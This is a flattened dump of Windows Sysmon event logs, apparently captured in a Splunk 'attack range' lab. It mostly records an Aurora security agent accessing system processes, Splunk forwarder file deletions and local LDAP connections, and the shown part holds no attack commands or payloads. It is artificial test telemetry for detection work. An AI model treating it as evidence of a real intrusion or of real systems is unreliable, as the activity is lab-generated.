Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039753Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.976{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039752Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.975{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039751Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.974{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039750Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.966{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039749Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.942{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 354300x800000000000000015074Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:52.043{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50035-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 10341000x800000000000000039748Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.909{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039747Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.901{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039746Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.892{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039745Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.888{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039744Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.886{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039743Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.883{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039742Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.880{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039741Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.878{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039740Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.877{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039739Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.874{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039738Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.873{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039737Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.872{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039736Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.871{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039735Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.870{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000039734Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.818{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=258FD40AB29D7BD8E104D606EA216AD9,SHA256=504E0D0E090A0B6F07B0A723136B8AEF9F01AA22CFE9E01E91EFE79A68F1538D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039733Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.520{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=BB31CA60CF13AB52C2B01A783CD692E5,SHA256=028C27FB4CB230728191CC6724BAA0A23113308544F8FACBB78D38FCDF5C120E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039732Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.365{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039731Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.364{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039730Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.172{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-F104-00000000AF02}6068C:\Program Files\Aurora-Agent\aurora-agent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000015076Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:55.858{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DACD18CBA13F7AA0D0086C8F5577C64A,SHA256=3E9B8E2EF44196CBA08949C933800F5355EFFC775C19F730A886EF1D2C6A981A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039760Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:55.128{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\Caches\{0BDE7B0F-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.dbMD5=F3DC4461F59519C68ABD86B979EA9762,SHA256=5896967D61C1C716C98511DCFC267A12749D330E5DEB35ECCB4690DFA756C964,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039759Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:55.050{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Local\Microsoft\Windows\1033\StructuredQuerySchema.binMD5=E871053170AD09568882637D049295DC,SHA256=CEA9EABB0B46AC602CDC3FB6FE6215981F2D7C0C6A5C5023CE72860232DBE12B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039758Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:55.034{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE376DD6DCF75686511E74A2A3F55540,SHA256=7CACB1BB1F12606CA35459FC6FEFEBFB72856DC49498825F39F391E8E6E44FCA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015077Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:56.953{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91C19CA7BD7D2FA375776369610623E4,SHA256=8C8514832B60CC29E4BB761CEA22A24DE7F09C9A69189AC12CE90FCB98BB56A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000039763Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.291{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56220-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 354300x800000000000000039762Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:54.291{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local56220-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local389ldap 23542300x800000000000000039761Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:56.003{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=305C3160AFCD3BE36A40CDE08A0900F4,SHA256=E1D7C975F6CA1C30E4EF9B8F2ACCD3A57DE7CFAFA9BB0D51181F2CEF1936871C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039764Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:57.086{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62D213408D3709DA990C99D0E40D068F,SHA256=61977A472845966220B5EAA5327B7C4C340EF90290AD6B2ADC774B5D5A6AC3DF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000039766Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:56.654{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56221-false10.0.1.12-8000- 23542300x800000000000000039765Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:58.193{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT 